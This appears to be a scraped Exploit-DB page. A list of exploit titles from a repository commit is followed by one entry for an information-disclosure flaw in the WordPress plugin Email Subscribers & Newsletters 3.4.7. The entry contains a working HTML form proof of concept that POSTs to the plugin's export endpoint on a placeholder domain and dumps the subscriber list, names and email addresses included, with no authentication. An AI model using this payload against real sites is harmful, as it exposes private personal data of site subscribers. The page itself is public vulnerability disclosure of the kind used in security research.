
8 changes to exploits/shellcodes RAVPower 2.000.056 - Memory Disclosure Acunetix WVS 10 - Local Privilege Escalation Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit) Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape Blizzard Update Agent - JSON RPC DNS Rebinding NoMachine 5.3.9 - Local Privilege Escalation Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) Acunetix WVS 10 - Remote Command Execution RAVPower 2.000.056 - Root Remote Code Execution Kaltura - Remote PHP Code Execution over Cookie (Metasploit) GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit) Vodafone Mobile Wifi - Reset Admin Password Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution Professional Local Directory Script 1.0 - SQL Injection WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
18 lines
No EOL
751 B
HTML
18 lines
No EOL
751 B
HTML
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
|
||
# Google Dork:
|
||
# Date: 2018-01-23
|
||
# Exploit Author: ThreatPress Security
|
||
# Vendor Homepage: http://icegram.com/
|
||
# Software Link: https://wordpress.org/plugins/email-subscribers/
|
||
# Version: 3.4.7
|
||
# Tested on: WordPress 4.9.2
|
||
# CVE :
|
||
|
||
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed
the vulnerability that allows an unauthenticated user to download the entire subscriber
list with names and e-mail addresses.
|
||
|
||
Exploit:
|
||
|
||
<form action="http://DOMAINTOTEST.com/?es=export" method="post">
|
||
<input type="text" name="option" value="view_all_subscribers" />
|
||
<input type="submit" value="Exploit" />
|
||
</form> |